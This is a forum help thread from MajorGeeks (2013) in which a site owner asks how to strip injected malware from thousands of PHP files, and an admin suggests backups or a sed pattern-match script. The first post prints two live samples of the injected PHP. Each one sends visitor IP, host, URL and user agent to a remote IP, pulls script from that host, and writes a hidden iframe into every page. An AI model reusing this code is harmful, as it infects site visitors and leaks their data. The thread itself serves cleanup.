How do I remove this Malware?

Discussion in 'Malware Help (A Specialist Will Reply)' started by MrCanuck, Aug 31, 2013.

  1. MrCanuck

    MrCanuck Private E-2

    I have a server at GoDaddy and I have about 6 different websites on it.

    I have malware on all the files (thousands) throughout the server.

    Normally I would just download all the files and then do a "search and replace" ALL in Dreamweaver and get rid of the malicious code in all the files.

    However, the problem with this one is that each malicious code is different for each file.

    Below you will see the malicious code from two separate PHP files on my site. The text in "green" is where it is different in every file.

    Any way to remove this without having to go through thousands of files 1 by 1?

    Code:
    <?php /*f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse*/if (!defined('HDDD467FFEY322')){function _shutdown_function($asd){$write =<<<AOLEW
<script type='text/javascript'>##JS##if (typeof KDDRTFGEG == 'undefined' && typeof f2 != 'undefined') {var it=f2().split('|');var dkm='';for (i=0;i<it.length;i++)dkm+=f1((it[i]-67)>>1);document.write("<iframe src='"+dkm+"' style='position:absolute;top:-1000px;left:-1000px;text-indent:-1000;width:1px;height:1px;'></iframe>");KDDRTFGEG=true;}</script>
AOLEW;
$asd = preg_replace('/<!--f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse-->(.*?)<!--f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse-->/i', '', $asd); $sess_id = empty($_COOKIE['PHP_SESSION_ID']) ? 0 : intval($_COOKIE['PHP_SESSION_ID']); $sdf='';if ($sess_id < 2) $sdf = file_get_contents('[COLOR="Lime"]http://82.200.204.155/tmp/jquery.js?96=67&3be61b7b='.base64_encode[/COLOR]($_SERVER['REMOTE_ADDR'].'|'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'|'.$_SERVER['HTTP_USER_AGENT']).'&fid=1fad2e56559d7f5e572cbe4200bac834'); if (!empty($sdf)) $sdf.= "var exdate=new Date();exdate.setDate(exdate.getDate() + 14);document.cookie='PHP_SESSION_ID=".(++$sess_id)."; expires='+exdate.toUTCString();"; return str_replace('</body>', str_replace('##JS##', $sdf, $write) . '</body>', $asd);}if (function_exists('ob_start') && is_callable('ob_start')) $result = ob_start('_shutdown_function', 0, true);define('HDDD467FFEY322', 1);}/*f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse*/ ?>
    Code:
    <?php /*f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse*/if (!defined('HDDD467FFEY322')){function _shutdown_function($asd){$write =<<<AOLEW
<script type='text/javascript'>##JS##if (typeof KDDRTFGEG == 'undefined' && typeof f2 != 'undefined') {var it=f2().split('|');var dkm='';for (i=0;i<it.length;i++)dkm+=f1((it[i]-55)>>1);document.write("<iframe src='"+dkm+"' style='position:absolute;top:-1000px;left:-1000px;text-indent:-1000;width:1px;height:1px;'></iframe>");KDDRTFGEG=true;}</script>
AOLEW;
$asd = preg_replace('/<!--f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse-->(.*?)<!--f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse-->/i', '', $asd); $sess_id = empty($_COOKIE['PHP_SESSION_ID']) ? 0 : intval($_COOKIE['PHP_SESSION_ID']); $sdf='';if ($sess_id < 2) $sdf = file_get_contents('[COLOR="Lime"]http://82.200.204.155/tmp/jquery.js?968=55&9a='.base64_encode[/COLOR]($_SERVER['REMOTE_ADDR'].'|'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'].'|'.$_SERVER['HTTP_USER_AGENT']).'&fid=1fad2e56559d7f5e572cbe4200bac834'); if (!empty($sdf)) $sdf.= "var exdate=new Date();exdate.setDate(exdate.getDate() + 14);document.cookie='PHP_SESSION_ID=".(++$sess_id)."; expires='+exdate.toUTCString();"; return str_replace('</body>', str_replace('##JS##', $sdf, $write) . '</body>', $asd);}if (function_exists('ob_start') && is_callable('ob_start')) $result = ob_start('_shutdown_function', 0, true);define('HDDD467FFEY322', 1);}/*f722ecd8c62d5e4b2c57c0c3c7b0a063e95hutz1qfki7rse*/ ?>
     
    MrCanuck, Aug 31, 2013
    #1
  2. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    Welcome to Major Geeks!

    Infections like this in website coding are not something we can really help you with unless you have an antivirus program that can scan and repair the files which is unlikely in most cases. Restoring from backups would be the easiest solution if you have them. Other wise you would need to create a script to manually search and replace the problem strings in all the files. You could possibly use a program like SED ( stream editor ) to do this. In both of your examples, the problem occurs in between this string

    $sdf = file_get_contents('

    and this string

    ($_SERVER['REMOTE_ADDR']

    You would have to create a script using a pattern match to replace everything in between those patterns with what you want to be there.
     
    chaslang, Sep 1, 2013
    #2
  3. MrCanuck

    MrCanuck Private E-2

    Thank you for the reply and the advice. I will look in to your suggestions. Thanks again.
     
    MrCanuck, Sep 1, 2013
    #3
  4. chaslang

    chaslang MajorGeeks Admin - Master Malware Expert Staff Member

    You're welcome. Good luck.
     
    chaslang, Sep 1, 2013
    #4

MajorGeeks.Com Menu

Downloads All In One Tweaks \ Android \ Anti-Malware \ Anti-Virus \ Appearance \ Backup \ Browsers \ CD\DVD\Blu-Ray \ Covert Ops \ Drive Utilities \ Drivers \ Graphics \ Internet Tools \ Multimedia \ Networking \ Office Tools \ PC Games \ System Tools \ Mac/Apple/Ipad Downloads

Other News: Top Downloads \ News (Tech) \ Off Base (Other Websites News) \ Way Off Base (Offbeat Stories and Pics)

Social: Facebook \ YouTube \ Twitter \ Tumblr \ Pintrest \ RSS Feeds